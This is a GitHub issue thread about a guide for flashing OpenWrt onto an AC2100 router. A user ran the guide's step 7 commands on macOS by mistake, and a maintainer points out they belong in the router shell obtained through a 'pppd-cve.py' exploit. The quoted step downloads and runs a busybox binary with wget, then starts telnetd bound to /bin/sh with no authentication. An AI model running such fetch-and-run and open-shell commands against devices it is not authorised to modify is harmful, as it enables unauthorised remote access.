### ISSUE TITLE
Busybox not working for Catalina

### ISSUE THREAD

**Issue by juliovedovatto** [impulse/ac2100-openwrt-guide#3]
Looking at your guide, I decided to buy this router model for my home.

Followed steps 1 to 6, but I got stuck on Step 7

```
If you do the following commands quickly, there should be no issues:

cd /tmp
wget http://192.168.31.177/busybox
chmod a+x ./busybox
./busybox telnetd -l /bin/sh
```

for me the result is:

```
# ./busybox telnetd -l /bin/sh
zsh: exec format error: ./busybox
```

I also tried to execut using /bin/sh

```
sh: ./busybox: cannot execute binary file
```

 I don't know which MacOS version you used to make this guide, but for me this bundled version of Busybox is not working.

*Notes:*

* I tried to compile a version from https://github.com/daliworks/busybox-osx, but no success when I try to run the telnetd command.
* I tried to use `telned` from `brew`, but the command arguments are slightly different.

**Comment by ecklf** [comment]
Please read the guide carefully. Busybox is **never** meant to be executed on macOS. It's sole purpose is to start the telnet daemon on the router. You are either using the wrong terminal session or the unstable connection dropped and you are back in your Catalina zsh session.

**Comment by juliovedovatto** [comment]
@impulse I hadn't noticed that `netcat` became a shell after running `pppd-cve.py` 🤦🏻‍♂️. 

I was sending commands from wrong shell, duh

I ran the commands inside this shell and I was able to follow the rest of guide.

Result: 
![image](https://user-images.githubusercontent.com/320507/87351788-53028e80-c530-11ea-9b26-32743a2e7131.png)

My apologies for the misunderstanding.

**Comment by ecklf** [comment]
> @impulse I hadn't noticed that `netcat` became a shell after running `pppd-cve.py` 🤦🏻‍♂️.
> 
> I was sending commands from wrong shell, duh
> 
> I ran the commands inside this shell and I was able to follow the rest of guide.
> 
> Result:
> ![image](https://user-images.githubusercontent.com/320507/87351788-53028e80-c530-11ea-9b26-32743a2e7131.png)
> 
> My apologies for the misunderstanding.

No worries, it happens 👍. Have fun with OpenWrt.
